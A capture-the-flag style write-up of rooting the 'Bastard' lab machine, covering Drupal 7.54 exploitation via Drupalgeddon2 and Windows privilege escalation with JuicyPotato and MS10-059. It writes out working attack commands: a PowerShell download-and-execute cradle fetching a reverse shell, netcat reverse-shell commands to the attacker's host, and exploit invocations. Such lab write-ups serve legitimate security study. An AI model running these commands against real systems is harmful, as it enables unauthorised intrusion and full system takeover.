# BASTARD | 10.10.10.9

## Initial Enumeration - nmap

    nmap -T4 -v -sC -sV -oN nmap/initial 10.10.10.9

## Open Ports and Running Services

* 80 - HTTP - Microsoft IIS 7.5 - running Drupal 7
* 135 - MSRPC
* 49154 - MSRPC

## OS Discovery

Since the machine is running IIS 7.5 the OS could be either Windows 7 or Windows Server 2008 R2.

## Service Enumeration

### HTTP (80)

Navigating to the page gives us a Drupal login screen:

![drupal-login](img/drupal.png)

Perhaps one way in is through bruteforcing the login, which I hate, but if it comes to it I guess I'll do it.  
There are also a number of disallowed entries in robots.txt:

![robots](img/robots.png)

Navigating to the CHANGELOG.txt file reveals that the specific version of Drupal is 7.54, which gives us more info to search for vulns.

![drupal-version](img/version.png)

A searchsploit query pulls up a few potential vulnerabilities, although I want to avoid using Metasploit as much as possible:

![searchsploit](img/searchsploit-drupal.png)

## Exploitation

I tried the python version of _Drupalgeddon2_ but the result said not exploitable, so I kept looking for other options.

![not-exploitable](img/geddon2.png)

I found a decent writeup [here](https://www.ambionics.io/blog/drupal-services-module-rce) about a services module unserialize to RCE that might work for me, I just need to edit the correct parts of the exploit, as well as confirm the 'endpoint path':

![endpoint](img/endpoint.png)

After a little bit of manual digging, I found the endpoint here:

![rest](img/rest.png)

This exploit works first by exploiting an SQL injection to get the admin creds and hash, then it alters the cache to allow us to write a file (which is where the reverse shell goes), then it restores the cache to it's original state, making this a very stealthy exploit.  
However, I was unable to get code execution this way, and the exploit failed to return the cache back to it's original state. So I was forced to look for yet another option.  

### Drupalgeddon2 with python

I found [this](https://github.com/pimps/CVE-2018-7600) exploit, which is a newer exploit and a python version of the Metasploit Drupalgeddon 2 exploit. Worth a try!

![usage](img/usage.png)

When I trigger the exploit, I can specify any command I want, so I went with a powershell download command:

    powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.18/shelly.ps1')"

I will need to have a python server running so that command can grab the reverse powershell script (modified from [Nishang](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)):

    python3 -m http.server 80

And finally, I must have a netcat listener running, to catch the shell:

    nc -nvlp -6969

OK, let's try this!

![exploit](img/exploit.png)

The exploit runs the powershell command to download the reverse shell, and then a moment later I have a shell!

![shell](img/iusr.png)

## User Enumeration

Right away I grab the user flag, and then start enumerating this user (which is different from the regular user):

![user-flag](img/user-flag.png)

Systeminfo shows me we are dealing with a Windows 2008 Server, and that there are no hotfixes installed:

![info](img/systeminfo.png)

Also, this user has the wonderful **SeImpersonatePrivilege**, which should allow me to escalate to NT AUTHORITY:

![privs](img/privs.png)

So, let's get to it.

## Privilege Escalation

### JuicyPotato

I have become quite familiar with this exploit as a previous box I worked on was vulnerable to this, so I should hopefully have no problem getting through this.

I will need to get netcat on the box, as well as the JuicyPotato exe, and have a netcat listener waiting on my end.

![files](img/files.png)

OK, so I have a netcat listener ready to go to catch the resulting shell; time to run the correct command:

    ./tater.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.18 9001" -t *

Well, this command did not work, so I guess it is not the correct way to escalate. Time to go do more enumeration.

## Enumeration (again)

I grabbed the systeminfo from before and copied it into a text file on my machine. I am going to use [Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to check for other local exploits.

    ./win-ex-suggester.py -d 2020-08-17-mssb.xls -i ~/Documents/wpe-capstone/2-BASTARD/exploits/sysinfo.txt

The results had a few options, and the first one I decided to go with was **MS10-059** since I have that exe in my inventory already and I have used it on another machine. It is known as ["Chimichurri"](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri) for some reason.

    (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.18/chimi.exe','C:\inetpub\drupal-7.54\chimi.exe')

Despite this command throwing an error, the exe is in fact there on the box:

![chimi](img/chimi.png)

## Privilege Escalation (for real this time)

To trigger the exploit I must have a netcat listener running:

    nc -nvlp 9001

Here goes nothing!

    ./chimi.exe 10.10.14.18 9001

It was a bit buggy - the exploit appeared to hang, but on the other side I had a system shell:

![root](img/root-shell.png)

Last thing to do is to grab the root flag as proof and we're done:

![root-flag](img/root-flag.png)

## Conclusion

I had a difficult time with this box, with the several avenues available proving untenable for my limited skills. A lot of trial and error was involved, and I again struggled with the proper PowerShell syntax at times.  
Also, because the user had the SeImpersonatePrivilege, I assumed that was the road to victory, and kept trying the JuicyPotato exploit over and over even though it kept failing.  
Finally I realized that was just the low hanging fruit and I didn't even do more thorough enumeration.

So the steps I took to root this box were as follows:

* Exploit a vulnerability in the Drupal platform to gain an unprivileged shell
* Take advantage of an unpatched Windows 2008 Server to use a kernel exploit to get root

Sounds so simple when I put it that way, but it took a lot of research and trial and error to succeed. The Drupal exploit was cool though, because I had to have three terminal windows going at once, which was fun.
